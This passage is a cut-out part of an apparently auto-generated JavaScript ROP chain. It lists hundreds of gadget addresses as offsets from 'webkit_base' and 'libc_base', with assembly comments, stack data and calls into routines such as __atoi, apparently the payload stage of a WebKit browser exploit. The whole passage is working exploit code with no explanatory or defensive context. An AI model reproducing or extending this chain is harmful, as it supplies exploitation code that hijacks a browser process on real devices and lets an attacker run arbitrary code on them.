db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7373: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+360016, //L7375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7375: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+360144, //L7377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+360160, //L7378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+360128, //L7376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7376: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+360320, //L7382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+360288, //L7380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+360304, //L7381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7379: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7382: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+360376, //L7384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7384: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+360504, //L7386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+360520, //L7387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+360488, //L7385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7387: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+360680, 
//L7391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+360648, //L7389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+360664, //L7390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7388: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7389: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7390: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7391: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+360736, //L7393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7393: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+360864, //L7395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+360880, //L7396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+360848, //L7394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7394: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7395: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7396: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+360960, //L7397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+360976, //L7398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7397: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7398: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+361072, //L7400 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+361056, //L7399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7400: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L7402: ropchain+361176, //L7401 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+180736, //__is_digit //L7401: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+361304, //L7405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+361288, //L7404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7403: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7405: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+361360, //L7407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7407: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+361488, //L7409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+361504, //L7410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+361472, //L7408 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7408: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7409: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7410: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+361616, //L7412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+361664, //L7415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+361632, //L7413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7412: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7413: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7414: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7415: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+361776, //L7416+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+361768, //L7416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7416: db([0, 0]); // 0x0 set_gadgets([ ropchain+361792, //L7416+24 ropchain+362256, //L7411 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+361848, //L7418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7417: db([40, 0]); // 0x28 set_gadget(libc_base+759608,); //pop rax //L7418: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L7420: ropchain+361960, //L7419 libc_base+764760 //pop rsi ]); db([8, 0]); // 
0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+185320, //__atoi //L7419: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+362088, //L7423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+362072, //L7422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7421: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7422: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7423: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+362152, //L7424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7424: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7426: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+362232, //L7428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7428: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+368160, //L7427 //L7411: libc_base+764760, //pop rsi ropchain+362296, //L7430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7430: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7432: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+362416, //L7435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+362400, //L7433 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7433: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7435: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+362496, //L7436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+362512, //L7437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7436: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7437: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+362672, //L7441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+362640, //L7439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+362656, //L7440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7438: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7439: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7440: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7441: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+362728, //L7443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7443: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+362856, //L7445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+362872, //L7446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+362840, //L7444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L7444: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7445: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7446: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+363032, //L7450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+363000, //L7448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+363016, //L7449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7447: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7448: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7450: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+363088, //L7452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7452: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+363216, //L7454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+363232, //L7455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+363200, //L7453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7453: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7454: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7455: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+363392, //L7459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+363360, //L7457 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+363376, //L7458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7456: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7457: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7458: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7459: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+363448, //L7461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7461: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+363576, //L7463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+363592, //L7464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+363560, //L7462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7462: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7463: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7464: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+363672, //L7465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+363688, //L7466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7465: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7466: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+363784, //L7468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+363768, //L7467 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+144605 //pop rdi ]); //L7467: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7468: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+363864, //L7469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7469: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7470: db([42, 0]); // 0x2a set_gadget(libc_base+144605,); //pop rdi //L7471: db([42, 0]); // 0x2a set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+364008, //L7472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+364040, //L7474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+364024, //L7473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7472: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7474: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+364208, //L7476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+364224, //L7477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+364192, //L7475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7475: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L7476: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7477: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+364336, //L7479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+364384, //L7482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+364352, //L7480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7479: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7480: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7481: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7482: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+364496, //L7483+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+364488, //L7483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7483: db([0, 0]); // 0x0 set_gadgets([ ropchain+364512, //L7483+24 ropchain+368160, //L7478 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7484: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7486: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+364648, //L7489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+364632, //L7487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7487: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7489: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop 
rsi ropchain+364808, //L7493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+364760, //L7490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+364776, //L7491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7490: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7491: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7492: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L7493: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+364864, //L7494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7494: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7496: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+364984, //L7497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+365000, //L7499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7497: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7499: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+365176, //L7502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+365192, //L7503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+365144, //L7500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+365160, //L7501 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+763368 //pop rcx ]); //L7500: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7501: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7503: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+365272, //L7504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+365288, //L7505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7504: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7505: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+365368, //L7506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+365384, //L7507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7507: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+365472, //L7508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+365488, //L7510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7511: db([4294967260, 4294967295]); // -0x24 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+365592, //L7512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+365608, //L7513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L7512: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7513: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7514: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7515: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+365736, //L7517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+365720, //L7516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7516: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+365816, //L7518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7518: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7520: db([4294967260, 4294967295]); // -0x24 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+365936, //L7523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+365920, //L7521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7521: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7523: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+366112, //L7526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+366128, //L7527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+366080, //L7524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
